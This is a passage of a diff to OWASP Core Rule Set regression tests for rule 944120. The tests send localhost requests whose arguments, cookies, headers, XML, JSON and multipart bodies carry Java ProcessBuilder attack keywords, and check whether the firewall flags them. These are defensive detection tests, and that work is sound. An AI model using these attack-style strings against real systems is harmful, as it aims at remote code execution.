ProcessBuilder.evil.forclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.forclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 23 desc: "XML element includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 24 desc: "XML attribute name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 25 desc: "XML attribute value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 26 desc: "XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - 
headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure" + output: + log: + expect_ids: [944120] + - test_id: 27 desc: "Nested XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure" + output: + log: + expect_ids: [944120] + - test_id: 
28 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.forclosure" + output: + log: + expect_ids: [944120] + - test_id: 29 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.forclosure\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.forclosure\"}" + output: + log: + expect_ids: [944120] + - test_id: 30 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.forclosure\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.forclosure\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 31 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: 
application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.forclosure": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-32 + {"ProcessBuilder.evil.forclosure": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 32 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + 
uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.forclosure": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-33 + {"ProcessBuilder.evil.forclosure": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 33 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.forclosure - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-34 + ProcessBuilder.evil.forclosure + -----------------------------thisissparta-- + output: + log: + 
expect_ids: [944120] + - test_id: 34 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.forclosure - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-35 + ProcessBuilder.evil.forclosure + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 35 desc: "Argument test includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatefactory" + output: + log: + expect_ids: [944120] + - test_id: 36 desc: "Argument name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatefactory=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory=test" + output: + log: + expect_ids: [944120] + - test_id: 37 desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - 
headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.instantiatefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.instantiatefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 38 desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.instantiatefactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.instantiatefactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 39 desc: "Request header test includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.instantiatefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.instantiatefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 40 desc: "XML element includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-41 + - input: + dest_addr: "127.0.0.1" + port: 80 
+ headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 41 desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 42 desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: 
"id \"944120\"" - - test_title: 944120-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 43 desc: "XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory" + output: + log: + expect_ids: [944120] + - test_id: 44 desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory" + output: + log: + expect_ids: [944120] + - test_id: 45 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatefactory" + output: + log: + expect_ids: [944120] + - test_id: 46 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.instantiatefactory\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.instantiatefactory\"}" + output: + log: + expect_ids: [944120] + - test_id: 47 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 
